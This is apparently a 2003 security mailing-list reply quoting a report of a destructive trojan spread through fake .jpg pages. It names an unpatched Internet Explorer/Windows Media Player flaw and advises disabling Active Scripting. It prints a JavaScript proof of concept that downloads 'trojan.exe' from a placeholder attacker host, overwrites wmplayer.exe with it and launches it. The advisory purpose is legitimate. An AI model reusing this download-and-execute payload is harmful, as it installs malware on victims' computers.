In-Reply-To: <000f01c39ced$e5abce50$0900000a@whitestar> it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" : http://www.k-otik.com/WMPLAYER-TEST/ http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2 http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm To prevent this exploit : Disable Active Scripting Regards. K-Otik Staff /// http://www.k-otik.com ----------------------- POC ------------------------- var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://attacker/trojan.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; ----------------------------------------------------- >From: "Gadi Evron" <ge@egotistical.reprehensible.net> >Subject: a dangerous fast spreading (yet simple) trojan horse. >Date: Mon, 27 Oct 2003 16:52:57 -0800 > >I usually do not email about "new" trojan horses unless they have >something "special" about them, for there are a lot of them coming out >non-stop. However, with this one, >Although quite simple, is very destructive and spreading at incredible >speed. > >The trojan horse spreads by people going to different URL's to download >a *.jpg (started with britney.jpg). > >The jpeg is actually an HTML file, and when the web browser receives it, >it thinks that it is a server error message for the file not existing, >and loads the page. > >In the page we find a javascript line, that using hex encoding in an >attempt to hide what it does, downloads patch.exe and replaces >mplayer.exe with the new file. >patch.exe connects to the mIRC DDE server, causing mIRC to spam, and >then it start ruining the system's registry. Starting to delete keys at >root and enumerating from there, one at a time. >What I signify, and forgive my language, as an "Hump and dump" trojan >horse. > >This reminds me of the first patch.exe trojan horse, that was purely a >destructive file - back in 95/96. > >I would also like to commend angelfire for shutting down the first web >page this appeared on very quickly. They always respond to abuse in a >timely manner. The geocities page is still up last time I checked. > >Not very complicated, but interesting, and very dangerous. > > Gadi Evron (i.e. ge), > ge@linuxbox.org. > >-------- >gevron@netvision.net.il >PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID). >Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741. > > >
